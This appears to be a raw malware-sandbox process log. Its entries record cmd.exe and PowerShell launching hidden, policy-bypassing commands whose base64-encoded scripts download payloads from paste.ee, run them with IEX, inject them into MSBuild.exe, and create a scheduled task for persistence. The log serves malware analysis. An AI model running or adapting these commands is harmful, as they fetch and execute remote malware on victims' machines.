EEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXAHcAQgBOAEEARwBrAEEAWQB3AEI
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA; }else{ exit;}
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA; }else{ exit;}
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXAHcAQgBOAEEARwBrAEEAWQB3AEIJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA; }else{ exit;}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBX